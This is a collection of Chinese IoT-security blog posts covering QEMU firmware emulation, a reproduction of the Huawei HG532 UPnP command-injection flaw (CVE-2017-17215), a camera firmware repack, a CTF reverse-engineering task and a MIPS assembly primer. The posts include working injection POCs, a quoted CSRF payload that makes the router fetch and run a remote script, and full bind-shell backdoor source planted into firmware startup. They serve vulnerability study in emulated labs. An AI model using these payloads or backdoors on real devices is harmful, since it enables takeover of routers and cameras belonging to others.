物联网IoT安全

精选｜QEMU仿真方式总结

Mon, 28 Jun 2021 20:01:00 +0800

原创小R同学 2021-06-28 20:01

QEMU仿真方式总结

QEMU是目前最先进的动态二进制翻译跨平台仿真软件，它可以模拟x86、ARM、ARM64、MIPS、PowerPC等架构。QEMU的原理主要是将ELF格式的可执行文件翻译成中间形式，然后根据中间形式，拷贝编译好的微操作代码，形成目标基本块，最后再执行此基本块。它的总体结构如图所示

QEMU主要有两种仿真方式：

用户模式仿真：允许一个（Linux）进程执行在不同架构的CPU上，该模式下，QEMU 可以作为进程级虚拟机
系统模式仿真：允许仿真完整的系统，包括处理器和配套的外设，该模式下，QEMU 也可以作为系统虚拟机

接下来我们从QEMU的安装开始来讲解这两种仿真方式，需要用到的固件可以在后台回复「QEMU」获取

1 安装QEMU

sudo apt-get updatesudo apt-get install qemu-system-mipssudo apt-get install qemu-usersudo apt-get install qemu-user-staticsudo apt-get install qemu-utils

2 QEMU系统模式仿真

首先我们需要从debian官网下载kernel和image，地址如下：

https://people.debian.org/~aurel32/qemu/mipsel/

「为什么我们这里知道使用mipsel呢，你可以在文件系统内随便找一个ELF文件，然后使用file命令查看一下」

将目录中的所有文件下载到一个kernel内即可，同时也将固件解压放到同一目录

首先安装虚拟网络设备tun

sudo apt-get install uml-utilities

为root用户添加网卡tap0

sudo tunctl -t tap0 -u root

设置IP地址

sudo ifconfig tap0 192.168.3.1/24

查看一下我们设置的IP地址

ifconfig

进入kernel目录，并使用如下命令启动qemu：

sudo qemu-system-mipsel -M malta -kernel ./vmlinux-3.2.0-4-4kc-malta -hda ./debian_wheezy_mipsel_standard.qcow2 -append "root=/dev/sda1 console=tty0" -net nic -net tap,ifname=tap0,script=no,downscript=no -nographic -s

命令解析如下

效果如图所示

账号密码均为root

使用ifconfig配置仿真机的eth0网卡为192.168.3.2

ifconfig eth0 192.168.3.2

使用物理机测试与仿真机之间的连通性

ping 192.168.3.2

使用scp命令将squashfs.tar传入仿真机

scp squashfs.tar root@192.168.3.2:/root

在仿真机内使用tar命令解压

tar -zxvf squashfs.tar

挂载固件文件系统中的proc目录和dev目录到chroot环境，因为proc中存储着进程所需的文件，比如pid文件等等，而dev中存储着相关的设备

mount -o bind /dev ./squashfs-root/devmount -t proc /proc ./squashfs-root/proc/

使用chroot更改root目录，系统的目录结构将以squashfs-root作为根

chroot ./squashfs-root/ sh

至此，我们就可以运行该文件系统中的程序啦

3 QEMU用户模式仿真

因为我们要运行的是mipsel的程序，所以这里我们使用qemu-mipsel来执行

但如果有的时候目标程序使用了动态链接库就会导致我们执行失败，这个时候我们只要配合chroot使用即可，首先将qemu-mipsel拷贝到squashfs-root目录

cp $(which qemu-mipsel-static) .

sudo chroot . ./qemu-mipsel-static ./www/api

4 总结

QEMU的出现为我们这些测试人员节约了大量的成本。我们可以在没有开发板的情况下进行测试、调试和运行，大大提高了效率

参考引用：

https://swordfaith.github.io/2019/09/24/QEMU%20%E5%B7%A5%E4%BD%9C%E5%8E%9F%E7%90%86/基于QEMU的嵌入式系统仿真环境的构建（陈宇星）

复现｜路由器命令执行

Wed, 23 Jun 2021 17:00:00 +0800

原创小R同学 2021-06-23 17:00

快来跟我们一起复现漏洞吧～

上次有小伙伴反馈说，摄像头的仿真部分写的不详细，正好最近在先知上看到了ONESHELL师傅的文章「见参考链接1」，所以今天我们就以这台路由器为例子，使用QEMU仿真模拟并分析该漏洞的成因「固件下载后台回复： 华为路由器 」

!!文末另有福利哦!!

转发本文到朋友圈、参与抽奖获取同款路由器

1 解压固件

尝试binwalk提取文件系统：

binwalk -Me HG532eV100R001C01B020_upgrade_packet.bin

解压出来的有很多文件，最主要的就是squashfs文件系统这个文件夹

2 模拟仿真

首先在解包的文件系统中找一个可执行文件，使用file命令查看一下系统架构等信息

如上图所示，可以知道该系统为MIPS架构，因此我们在启动QEMU的时候需要使用MIPS的内核以及文件系统：

下载地址：

https://people.debian.org/~aurel32/qemu/mips/

因为我们期望宿主机能够和QEMU仿真机处在同一个网络环境中，所以我们要对网络进行设置，首先是在宿主机中配置tap网络：

sudo tunctl -t tap0 -u rootsudo ifconfig tap0 192.168.3.1/24sudo ifconfig

接下来启动QEMU：

sudo qemu-system-mips -M malta -kernel ./vmlinux-3.2.0-4-4kc-malta -hda ./debian_wheezy_mips_standard.qcow2 -append "root=/dev/sda1 console=tty0" -net nic -net tap,ifname=tap0,script=no,downscript=no -nographic -s

账号密码均为root

给qemu中的仿真机设置IP地址

为了方便上传解包的文件系统，我们这里先用tar将文件系统打包

使用SCP传输文件

在QEMU仿真机中解压

挂载固件文件系统中的proc目录和dev目录到chroot环境，因为proc中存储着进程所需的文件，比如pid文件等等，而dev中存储着相关的设备

mount -o bind /dev ./squashfs-root/devmount -t proc /proc ./squashfs-root/proc/chroot ./squashfs-root/ sh

通过ssh连接qemu，并启动路由器「此处需要再次执行chroot」

启动路由器

通过之前的qemu终端我们可以查看到ip地址已经发生变化，因此sh登陆的链接已经被断开，所以我们这里再将IP地址修改回来

这个时候再使用浏览器访问192.168.3.2即可

账号密码分别为：admin / @Hua1234，存在于固件压缩包的账号密码文件内：

3 漏洞复现

根据网上的复现文章，payload如下：

import requests headers = {    "Authorization": "Digest username=dslf-config, realm=HuaweiHomeGateway, nonce=88645cefb1f9ede0e336e3569d75ee30, uri=/ctrlt/DeviceUpgrade_1, response=3612f843a42db38f48f59d2a3597e19c, algorithm=MD5, qop=auth, nc=00000001, cnonce=248d1a2560100669"}
data = ''' <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">  <s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">   <NewStatusURL>;mkdir /bin/hell;NewStatusURL>   <NewDownloadURL>HUAWEIUPNPNewDownloadURL>  u:Upgrade> s:Body>s:Envelope>'''requests.post('http://192.168.3.2:37215/ctrlt/DeviceUpgrade_1',headers=headers,data=data)

可以看到在NewStatusURL标签处注入了代码，例如上面的POC为创建一个名为hell的文件夹。

4 漏洞分析

首先需要分析出这37215端口的应用程序「此处对应的程序为upnp｜怎么查找端口对应的程序可以参照我们之前的一篇文章」，然后对该程序进行逆向。从POC中可以分析，注入点是在，通过在Ghidra中搜索该字符串，并查找交叉引用，找到目标函数「IDA不大行，没法F5，我也不知道为啥，求知道的师傅讲解」：

我们可以看到这sprinf将418和414变量直接写入到了1040字符串，未经过任何验证就直接使用system执行

int FUN_0040749c(int param_1){  int iVar1;  int local_418;  int local_414;  char acStack1040 [1028];    iVar1 = ATP_XML_GetChildNodeByName(*(undefined4 *)(param_1 + 0x2c),"NewDownloadURL",0,&local_418);  if (((iVar1 == 0) && (local_418 != 0)) &&     (iVar1 = ATP_XML_GetChildNodeByName                        (*(undefined4 *)(param_1 + 0x2c),"NewStatusURL",0,&local_414), iVar1 == 0))  {    if (local_414 != 0) {      snprintf(acStack1040,0x400,"upg -g -U %s -t \'1 Firmware Upgrade Image\' -c upnp -r %s -d -b",               local_418,local_414);      system(acStack1040);    }  }  return iVar1;}

可以看到程序通过ATP_XML_GetChildNodeByName函数来获取NewDownloadURL节点的内容，然后判断结果是否为空，如果获取成功且结果不为空则继续获取NewStatusURL节点的内容，再判断结果是否空，如果不为空则将NewDownloadURL和NewStatusURL节点的内容拼接到字符串，并执行。

此处我们就可以构造插入命令执行

POC如下：

import requests headers = {    "Authorization": "Digest username=dslf-config, realm=HuaweiHomeGateway, nonce=88645cefb1f9ede0e336e3569d75ee30, uri=/ctrlt/DeviceUpgrade_1, response=3612f843a42db38f48f59d2a3597e19c, algorithm=MD5, qop=auth, nc=00000001, cnonce=248d1a2560100669"}
data = ''' <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">  <s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">   <NewStatusURL>;mkdir hell;NewStatusURL>   <NewDownloadURL>;mkdir hello;NewDownloadURL>  u:Upgrade> s:Body>s:Envelope>'''response = requests.post('http://192.168.3.2:37215/ctrlt/DeviceUpgrade_1',headers=headers,data=data)print(response)

在两个注入点分别注入不同的命令，qemu仿真机建立的文件如下

5 漏洞扩展

值得一提的是，该路由器的upnp只能从内网端口访问，默认无法从外网端口访问，那我们有什么办法扩大该漏洞影响呢？

通过查阅资料，我们发现了salt@腾讯玄武实验室师傅对该漏洞的探索，如下：

要成功发起该请求需要满足以下两点：一是成功通过服务器端的HTTP基础认证，二是构造XML攻击代码。仔细观察HTTP基础认证的字段，我们可以发现，用于基础认证的用户名和密码为dslf-config:admin。因此我们只需要构造表单，使之POST到http:// dslf-config:admin @routerip:37215即可自动完成基础认证。接下来就是如何用表单来构造一个XML的请求包了
https://paper.seebug.org/498/

最终，salt师傅构造的CSRF攻击payload如下：

<body onload='document.forms[0].submit()'>  <form method='POST' enctype='text/plain' action="http://dslf-config:admin@192.168.1.1:37215/ctrlt/DeviceUpgrade_1">    <input name='http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">a' value='1;$(/bin/busybox wget -g 192.168.1.2 -l /tmp/.f -r /b);$(echo HUAWEIUPNP)'>  form>body>

攻击者只要诱使用户访问包含上述代码的页面，存在漏洞的路由器就会远程下载一个bash脚本并以root的身份执行

能够将仅能在内网触发的漏洞扩大到远程攻击的想法，值得我们在每次漏洞挖掘中去思考

5 漏洞影响

在Satori僵尸网络事件中，攻击者使用的0day漏洞为华为家用路由器HG532远程执行任意代码（CVE-2017-17215），payload是名为OKIRU/SATORI，是Mirai的升级版变种。攻击发起者的昵称为Nexus Zeta

研究人员确认了漏洞后，就通报给华为，华为安全团队非常给力，很快对该漏洞进行了响应和修复，并提供了补丁

关于该僵尸漏洞的详细信息，可以阅读如下报告：https://cloud.tencent.com/developer/news/7159

Time Line：

2018-02-06 V1.5 UPDATED Updated the description
2017-12-22 V1.4 UPDATED Added the description of solution
2017-12-14 V1.3 UPDATED Added CVE-ID
2017-12-07 V1.2 UPDATED Added Temporary Fixes
2017-12-06 V1.1 UPDATED Added the IPS signature
2017-11-30 V1.0 INITIAL

参考引用：

https://xz.aliyun.com/t/8494https://xz.aliyun.com/t/4819https://paper.seebug.org/498/https://xz.aliyun.com/t/4130#toc-5https://f01965.com/2020/07/25/CVE-2017-17215/https://research.checkpoint.com/2017/good-zero-day-skiddie/

给小R同学加鸡腿🍗

小技巧｜用树莓派作串口模块

Tue, 22 Jun 2021 17:00:00 +0800

原创小R同学 2021-06-22 17:00

把树莓派和设备接在一起，回到电脑前远程串口办公不香吗？

今天测试时发现没有带串口模块，正好手边有个树莓派，所以将开启串口功能的步骤记录了下来，如有不正之处，万望指正：

1 修改APT软件源

本来直接用的树莓派自带的apt源，无奈挂代理都不好用，只好更换

在命令行输入sudo nano /etc/apt/sources.list将原来的内容使用#注释掉，并添加如下内容：

deb http://mirrors.tuna.tsinghua.edu.cn/raspbian/raspbian/ buster main non-free contribdeb-src http://mirrors.tuna.tsinghua.edu.cn/raspbian/raspbian/ buster main non-free contrib

安装minicom工具

sudo apt-get install minicom

2 开启raspberrypi的UART串口

首先进入树莓派配置sudo raspi-config选择接口选项

点击确定后，再选择串口

提示是否开启串口shell，这里我们因为要将raspberryPI作为串口工具用，所以我们选择否

提示是否开启硬件串口，选择是

然后重启，我们就不用买USB2TTL了XD

我们查看一下/dev下的设备文件，可以看到新增了一个ttyS0的接口

3 测试串口

接下来我们就来测试一下raspberryPI的串口，首先将其接到我们需要调试的设备上：

从这个引脚图中可以看出TX和RX分别在8和10脚，将树莓派的TX接到设备上的RX上，将树莓派的RX接到设备上的TX上

然后启动minicom -D /dev/ttyS0来查看信息

Emmmm,接下来我们就可以把树莓派和设备接在一起，回到电脑前远程串口啦

给小R同学加鸡腿🍗

复现｜摄像头固件重打包

Fri, 18 Jun 2021 17:00:00 +0800

原创小R同学 2021-06-18 17:00

固件分析、仿真、校验绕过一把梭

前两天w22师傅带来一个摄像头，在师傅的指导下复现了这个固件重打包漏洞，简单记录一下，又学到了很多不可描述的知识！

!!文末另有福利哦!!

转发本文到朋友圈、参与抽奖获取同款摄像头

首先拿到摄像头后因为没有固件，于是这里直接使用编程器读取Flash芯片的内容[略]，接下来就是对固件进行分析、仿真、校验分析及绕过

1 文件系统提取

首先使用Binwalk提取固件，使用如下命令提取，-M参数的意思是以递归扫描提取文件，-e则为自动提取已知文件

Binwalk -Me

从上图中可以看出文件系统类型为squashfs，压缩格式为xz

可以看到0.squashfs的大小为2886212字节

2 固件分析

首先分析一下/etc/init.d/rcS（一般rcS为启动程序）

可以看到他启动了一个goahead服务，并且挂载mtd后，启动了/mnt/mtd/startap

首先分析goahead，使用checksec命令或者file命令，可以看出是mips小端序

分析goahead程序，发现http目录的位置在/etc/webs中

在目录中发现一个可以上传固件升级的地方，他会把我们上传的固件交给cgi去处理：

但如果随意上传文件，会提示如下错误：

3 环境搭建

因为提取出固件了，所以我们这使用QEMU仿真运行，首先我们使用qemu启动Debian系统，再使用chroot命令切换到摄像头固件根目录：

sudo qemu-system-mipsel -M malta -kernel ./vmlinux-3.2.0-4-4kc-malta -hda ./debian_wheezy_mipsel_standard.qcow2 -append "root=/dev/sda1 console=tty0" -net nic -net tap,ifname=tap0,script=no,downscript=no -nographic -s

内核及镜像下载地址：

https://people.debian.org/~aurel32/qemu/mipsel/

挂载dev和proc，并chroot进固件中

启动gohead

访问刚刚我们发现的目录

4 固件上传校验分析及绕过

打开IDA，分析gohead，搜索Bad Magic Number字符串

在校验的过程中,它会获取一个地方取4个字节(Dword)与\x27\x05\x19\x56做一个字符串比较，而0x27051956正是uboot文件头的Magicnumber，与uboot的对比结构体如下

最后还需要将文件名修改为appfw

5 制作后门

#include #include #include #include #include #include 

#define SERVER_PORT    9999 /* CC-BY: Osanda Malith Jayathissa (@OsandaMalith)  * Bind Shell using Fork for my TP-Link mr3020 router running busybox  * Arch : MIPS  * mips-linux-gnu-gcc mybindshell.c -o mybindshell -static -EB -march=24kc  */int main() {    int serverfd, clientfd, server_pid, i = 0;    char *banner = "[~] Welcome to @OsandaMalith's Bind Shell\n";    char *args[] = { "/bin/busybox", "sh", (char *) 0 };    struct sockaddr_in server, client;    socklen_t len;        server.sin_family = AF_INET;    server.sin_port = htons(SERVER_PORT);    server.sin_addr.s_addr = INADDR_ANY; 
    serverfd = socket(AF_INET, SOCK_STREAM, 0);    bind(serverfd, (struct sockaddr *)&server, sizeof(server));    listen(serverfd, 1);
    while (1) {         len = sizeof(struct sockaddr);        clientfd = accept(serverfd, (struct sockaddr *)&client, &len);        server_pid = fork();         if (server_pid) {             write(clientfd, banner,  strlen(banner));            for(; i <3 /*u*/; i++) dup2(clientfd, i);            execve("/bin/busybox", args, (char *) 0);            close(clientfd);         } close(clientfd);    } return 0;}

这里我们使用OsandaMalith的后门，并使用MIPS的GCC进行交叉编译「建议使用buildroot」

将其移动到固件的/bin目录中

最后在/etc/init.d/rcS里的export之后加上启动脚本，如下所示：

在QEMU中测试后门是否能够正常使用：

6 固件重打包

首先是使用mksquashfs将根目录打包为squashfs文件系统

wget  https://www.squashfs-lzma.org/downloads/squashfs4.2.tar.gz

在默认配置的情况下，squashfs并不支持xz，这里我们修改一下Makefile使其支持XZ格式

另外还需要下载一个支持包并安装，地址如下：

wget https://tukaani.org/xz/xz-5.2.5.tar.gz./configuremake && sudo make install

安装squashfs-tools

最后使用如下命令打包文件系统：

mksquashfs squashfs-root/ my.bin -comp xz -b 256k

其中参数解析如下：

comp 参数可以指定压缩的格式 -b  可以指定 文件块大小(最小128K) 这里指定的数值越小, 压缩出来的文件越大

因为文件大小和之前的不相同，这里使用00进行填充

dd if=my.bin of=my.bin.ov bs=2949120 conv=sync

因为我们还缺少一个uImage头，所以还需要mkimage工具帮助我们生成uimage头

安装：sudo apt-get install u-boot-tools -y

生成uImage

mkimage -A MIPS -O linux -T kernel -C lzma -a 0x80000000 -e 0x803B8000 -n "rootfs" -d my.bin uImage

但是当尝试升级的时候依旧提示：

猜测可能是load address和entry point地址错误，通过串口调试，可以得到加载内核时的load address 和 entry address，然后使用mkimage重新生成固件

mkimage -A MIPS -O linux -T kernel -C lzma -a 0x80010000 -e 0x803a3f90 -n "rootfs" -d my.bin uImage

7 总结

感谢w22师傅的耐心指导，在复现该漏洞时，主要难点在于要分析出这是uImage头校验，以及在打包uImage时的load addr和entry point地址

可以看到我们在使用qemu仿真MIPS摄像头时，需要输入很长的命令，并每次都配置挂载点、IP等等，这里推荐一个docker版的qemu：

欢迎star：

https://github.com/yywz1999/myQemu

请于2021.6.25日前转发本推文至朋友圈（凭转发截图兑奖，开奖前删除无效），点击下方卡片进行抽奖

Switch APP逆向分析

Tue, 15 Jun 2021 17:00:00 +0800

小R同学 2021-06-15 17:00

Switch APP逆向分析

最近学习pwn，看到一个switch的逆向题目，于是乎在浩然表哥和the one表哥的帮助下研究了一波，学到了很多不可描述的知识。题目的下载地址：

https://www.icloud.com/iclouddrive/0ZkKpgouFpOW-DbEHvDSL2taQ#switch

下载题目附件后，根据扩展名使用Wireshark分析

不难发现，流量包中均为USB流量，猜测可能是通过USB传输了该APP，使用如下命令提取出传输的文件：

tshark -r switch.pcapng -Y 'usb.capdata and usb.device_address==4' -T fields -e usb.pcapng > raw

将文本16进制转换为二进制格式

xxd -r -p raw raw.out

我们将nop指令之前的内容全部删除掉，将文件另存为新的bin文件即可

我们大致了解了其架构，使用ida打开目标文件，Load file时按照如下选项配置

Rebase the whole program

通过查找交叉引用以及上下文分析，可以查找到该函数像是解密函数

主要逻辑为对每个字节AND上一个0x7F

将0x4001CCAD处的数据导出

编写脚本进行解密：

ciphertext = [  0xE5, 0xF2, 0xE5, 0xA7, 0xF3, 0xA0, 0xE9, 0xEE, 0xE6, 0xEF,   0xA0, 0xE6, 0xF2, 0xEF, 0xED, 0xA0, 0xE6, 0xF5, 0xF3, 0xE5,   0xA0, 0xA8, 0xC8, 0xD7, 0xC9, 0xA9, 0xBA, 0xA0, 0xA5, 0xF3,   0x8A, 0x80, 0x00, 0xD9, 0xEF, 0xF5, 0xF2, 0xA0, 0xF0, 0xF2,   0xE5, 0xE3, 0xE9, 0xEF, 0xF5, 0xF3, 0xA0, 0xF0, 0xF2, 0xE9,   0xF6, 0xE1, 0xF4, 0xE5, 0xA0, 0xEB, 0xE5, 0xF9, 0xA8, 0xD3,   0xC2, 0xCB, 0xA9, 0xBA, 0xA0, 0xA5, 0xF3, 0x8A, 0x80, 0x00,   0xD3, 0xC2, 0xCB, 0xA0, 0xC1, 0xC5, 0xD3, 0xC5, 0xA0, 0xB0,   0xA0, 0xA8, 0xF3, 0xEF, 0xED, 0xE5, 0xA0, 0xF2, 0xE1, 0xEE,   0xE4, 0xEF, 0xED, 0xA0, 0xF4, 0xE8, 0xE9, 0xEE, 0xE7, 0xF3,   0xA0, 0xE5, 0xEE, 0xE3, 0xF2, 0xF9, 0xF0, 0xF4, 0xE5, 0xE4,   0xA0, 0xE2, 0xF9, 0xA0, 0xF9, 0xEF, 0xF5, 0xF2, 0xA0, 0xEB,   0xE5, 0xF9, 0xA9, 0xBA, 0xA0, 0xA5, 0xF3, 0x8A, 0x80, 0x00,   0x8A, 0xD4, 0xE8, 0xE9, 0xF3, 0xA0, 0xE3, 0xF2, 0xE1, 0xE3,   0xEB, 0xED, 0xE5, 0xA0, 0xF2, 0xE5, 0xAD, 0xF5, 0xF3, 0xE5,   0xA0, 0xED, 0xEF, 0xF3, 0xF4, 0xEC, 0xF9, 0xA0, 0xF4, 0xE8,   0xE5, 0xA0, 0xE3, 0xEF, 0xE4, 0xE5, 0xF3, 0xA0, 0xE6, 0xF2,   0xEF, 0xED, 0xA0, 0xF2, 0xE1, 0xEA, 0xEB, 0xEF, 0xF3, 0xF4,   0xEF, 0xAE, 0xA0, 0xE8, 0xF5, 0xE7, 0xE5, 0xA0, 0xF4, 0xE8,   0xE1, 0xEE, 0xEB, 0xF3, 0xFE, 0x8A, 0x80, 0x00, 0xC8, 0xE5,   0xF2, 0xE5, 0xA7, 0xF3, 0xA0, 0xF9, 0xEF, 0xF5, 0xF2, 0xA0,   0xF0, 0xF2, 0xE5, 0xE3, 0xE9, 0xEF, 0xF5, 0xF3, 0xA0, 0xE6,   0xEC, 0xE1, 0xE7, 0xA1, 0xA1, 0x8A, 0xE6, 0xEC, 0xE1, 0xE7,   0xFB, 0xE3, 0xF6, 0xF6, 0xE4, 0xDF, 0xF3, 0xF7, 0xB1, 0xF4,   0xE3, 0xE8, 0xAD, 0xE8, 0xB0, 0xED, 0xE5, 0xE2, 0xF2, 0xB3,   0xF7, 0xAD, 0xE9, 0xF3, 0xAD, 0xE2, 0xF2, 0xB8, 0xEC, 0xE9,   0xE1, 0xEE, 0xF4, 0xFD, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00,   0x00, 0x00, 0x00]
flag = ""
for i in ciphertext:  flag+= chr(i & 0x7f)
print(flag)

还是太菜，很多东西没有分析明白，而且买来的switch好像还没用上，不过分手厨房很好玩....

在IoT设备中查找端口对应进程的四种方法

Mon, 18 Jan 2021 17:53:00 +0800

2021-01-18 17:53

列出了四种方法来查找某个端口当前正在运行的服务

这里我们列出了四种方法来查找某个端口当前正在运行的服务，如果师傅们还有什么其他好的想法欢迎交流

我们平时在测试物联网设备的时候，可能通过特殊方法获取了当前的设备的shell【如串口等等】。

这时，我们往往需要查找该设备开启端口对应的服务，再对该服务进行测试。但是在通过端口查找进程的过程中可能会遇到一些问题，因为物联网中的Linux系统往往经过精简，很多命令的参数无法使用

1 使用netstat

这是最常用的方法之一，Netstat可以用来显示显示网络连接，路由表，网络接口状态等等

Netstat在桌面版或者是服务器版的Linux上使用一般没有问题，但是该命令在嵌入式系统中往往被精简

sudo netstat -tulpn

从图中我们可以看到8000端口上运行的服务是python

解释一下每个参数的含义

 -t 显示tcp连接 -u 显示udp连接 -l 显示监听的套接字  -p 显示进程ID和该进程的名称 -n 显示数字地址

2 使用ss命令

ss命令可以用来显示处于活动状态的套接字信息。ss命令可以用来获取socket统计信息，它可以显示和netstat类似的内容。但ss的优势在于它能够显示更多更详细的有关TCP和连接状态的信息，而且比netstat更快速更高效

sudo ss -tulpn

如果netstat没有相关参数，建议师傅们试试这个命令

3 使用lsof

顾名思义，losf是一个列出当前系统打开文件的工具，不过该命令在一般嵌入式Linux可能没有

sudo lsof -i :8000

4 fuser

fuser命令用于报告进程使用的文件和网络套接字

sudo fuser 8000/tcp

如上图所示24254即为PID

接下来通过ps命令查找进程的详细信息

ps -p 24254

或者也可以直接使用fuser中的-v参数：

sudo fuser -v 8000/tcp

如果师傅们还有其他更好的查找方法，欢迎留言给我们哇～

你点的每个赞，我都认真当成了喜欢

十分钟教会你MIPS编程入门

Fri, 15 Jan 2021 20:00:00 +0800

thoupin 2021-01-15 20:00

十分钟教会你入门MIPS汇编

本文从四个方面来介绍MIPS架构及其汇编：

1. 寄存器种类

2. 算术及寻址指令

3. 程序结构

4. 系统调用

需要使用的工具是：Mars4.4

下载地址：

http://courses.missouristate.edu/KenVollmar/mars/download.htm

1 数据类型

1. 所有MIPS指令都是32位长

2. 1字节 = 8位，半字长 = 2个字节，1字长 = 4个字节

3. 一个字符空间 = 1个字节

4. 一个整型 = 一个字长 = 4个字节

5. 单个字符用单引号，例如：'b'

6. 字符串用双引号，例如："A string"

2 寄存器

1. MIPS下一共有32个通用寄存器

2. 在汇编中，寄存器标志由$符开头

3. 寄存器表示可以有两种方式

直接使用该寄存器对应的编号，例如：从$0到$31

使用对应的寄存器名称，例如：$t1,$sp(详细名称见下表)

4. Lo和Hi寄存器专门用来存储乘法和除法的结果

对于以上两者，不存在直接寻址；必须要通过特殊指令mfhi ("move from Hi") 和 mflo ("move from Lo")来访问内容

5. 栈的走向是高地址到低地址

3 程序结构

1. 本质其实就是数据声明 + 普通文本 + 程序编码（文件扩展名为 .s或者 .asm都可以）

2. 数据声明在代码段之后（其实在之前也没啥问题，也更符合高级程序的设计习惯）

数据声明：

1. 数据段以.data为开始标志

2. 声明变量后，即在主存中分配空间

代码：

1. 代码段以 .text为开始的标志

2. 其实就是各项指令操作

3. 程序入口为main:标志（这个都一样）

4. 程序结束标志

注释：

1. 是注释符

2. MIPS程序的基本模版如下：

# Comment giving name of program and description of function# 说明下程序的目的和作用（其实和高级语言都差不多了）# Template.s# Bare-bones outline of MIPS assembly language program
    .data       # variable declarations follow this line                # 数据变量声明                # ...
    .text       # instructions follow this line                  # 代码段部分  
main:      # indicates start of code (first instruction to execute)           # 主程序           # ...
# End of program, leave a blank line afterwards to make SPIM happy# 必须多给你一行，你才欢？

4 数据声明

声明的格式：

name:    storage_type     value(s)

通常给变量赋一个初始值；对于.space,需要指明需要多少大小空间（bytes)

注意：name后面始终要跟着冒号

examplevar1:        .word       3  # create a single integer variable with initial value 3# 声明一个 word 类型的变量 var1, 同时给其赋值为 3
array1:     .byte       'a','b'# create a 2-element character array with elements initialized# to  a  and  b# 声明一个存储2个字符的数组 array1，并赋值 'a', 'b'
array2:     .space      40  # allocate 40 consecutive bytes, with storage uninitialized# could be used as a 40-element character array, or a# 10-element integer array; a comment should indicate which!  # 为变量 array2 分配 40字节（bytes)未使用的连续空间，当然，对于这个变量# 到底要存放什么类型的值， 最好事先声明注释下！

5 加载保存【读取写入】

1. 如果要访问内存，不好意思，你只能用 load 或者 store 指令

2. 其他的只能都一律是寄存器操作

load:        lw  register_destination, RAM_source        # copy word (4 bytes) at source RAM location to destination register.        # 从内存中 复制 RAM_source 的内容到 对应的寄存器中（lw中的'w'意为'word',即该数据大小为4个字节）        lb  register_destination, RAM_source        # copy byte at source RAM location to low-order byte of destination register,and sign-extend to higher-order bytes        # 同上， lb 意为 load byte
store word:        sw  register_source, RAM_destination        # store word in source register into RAM destination        # 将指定寄存器中的数据 写入到指定的内存中        sb  register_source, RAM_destination        # store byte (low-order) in source register into RAM destination
load immediate:        li  register_destination, value        # load immediate value into destination register

举例

  .data        var1:  .word  23    # declare storage for var1; initial value is 23
  .text    __start:         lw  $t0, var1    # load contents of RAM location into register $t0:  $t0 = var1         li  $t1, 5       #  $t1 = 5   ("load immediate")         sw  $t1, var1    # store contents of register $t1 into RAM:  var1 = $t1         done

6 立即与间接寻址

load address:    la  $t0, var1    # 将var1的RAM地址复制到寄存器$t0中indirect addressing:    lw  $t2, ($t0)    #将$t0中包含的RAM地址的值加载到$t2中    sw  $t2, ($t0)    # 将寄存器$ t2中的值存储到$ t0中包含的地址的RAM中based or indexed addressing:    lw  $t2, 4($t0)    # 将RAM地址($t0+4)的值存到$t2寄存器    sw  $t2, -12($t0)    # 将$t2寄存器的值存到地址($t0-12)中

不必多说，要用到偏移量的寻址，基本上使用最多的场景无非两种：数组，栈。

    .data        array1:    .space  12    #  declare 12 bytes of storage to hold array of 3 integers    #  定义一个 12字节 长度的数组 array1, 容纳 3个整型    .text        __start:            la  $t0, array1              #  load base address of array into register $t0          #  让 $t0 = 数组首地址          li  $t1, 5              #  $t1 = 5   ("load immediate")          sw $t1, ($t0)              #  first array element set to 5; indirect addressing          # 对于 数组第一个元素赋值 array[0] = $1 = 5          li $t1, 13              #   $t1 = 13          sw $t1, 4($t0)              #  second array element set to 13          # 对于 数组第二个元素赋值 array[1] = $1 = 13           # (该数组中每个元素地址相距长度就是自身数据类型长度，即4字节， 所以对于array+4就是array[1])          li $t1, -7              #   $t1 = -7          sw $t1, 8($t0)              #  third array element set to -7          # 同上， array+8 = （address[array[0])+4）+ 4 = address(array[1]) + 4 = address(array[2])

7 算术指令集

1. 最多3个操作数

2. 在这里，操作数只能是寄存器，绝对不允许出现地址

3. 所有的指令统一是32位 = 4 * 8 bit = 4 bytes = 1 word

    add  $t0,$t1,$t2      #  $t0 = $t1 + $t2;   add as signed (2's complement) integers    sub  $t2,$t3,$t4      #  $t2 = $t3, $t4    addi  $t2,$t3, 5      # $t2 = $t3 + 5;   "add immediate" (no sub immediate)    addu  $t1,$t6,$t7      # $t1 = $t6 + $t7;   add as unsigned integers    subu  $t1,$t6,$t7      # $t1 = $t6 + $t7;   subtract as unsigned integers    mult  $t3,$t4        # multiply 32-bit quantities in $t3 and $t4, and store 64-bit    # result in special registers Lo and Hi:  (Hi,Lo) = $t3 * $t4    div  $t5,$t6        # Lo = $t5 / $t6   (integer quotient)    # Hi = $t5 mod $t6   (remainder)    mfhi  $t0        # move quantity in special register Hi to $t0:   $t0 = Hi    mflo  $t1        # move quantity in special register Lo to $t1:   $t1 = Lo    # used to get at result of product or quotient    move  $t2,$t3  #  $t2 = $t3

8 控制流

branches分支(if else系列)

指令内置了分支条件的比较：

b  target    #  unconditional branch to program label targetbeq  $t0,$t1,target  #  branch to target if  $t0 = $t1blt  $t0,$t1,target  #  branch to target if  $t0 < $t1ble  $t0,$t1,target  #  branch to target if  $t0 <= $t1bgt  $t0,$t1,target  #  branch to target if  $t0 > $t1bge  $t0,$t1,target  #  branch to target if  $t0 >= $t1bne  $t0,$t1,target  #  branch to target if  $t0 <> $t1

Jumps跳转(while,for,goto系列)

j  target  #  unconditional jump to program label target           # 看到就跳转，不用考虑任何条件  jr  $t3    # jump to address contained in $t3 ("jump register")           # 类似相对寻址，跳到该寄存器给出的地址处

子程序调用 subroutine return: "jump register" instruction

jr  $ra  #  "jump register"

跳转到寄存器$ra中保存的返回地址(由jal指令存储)

如果说调用的子程序中有调用了其他子程序，如此往复，则返回地址的标记就用栈(stack)来存储, 毕竟 $ra 只有一个，（哥哥我分身乏术啊）

9 系统调用和输入/输出

1. 通过系统调用实现终端的输入输出，以及声明程序结束

2. 学会使用 syscall

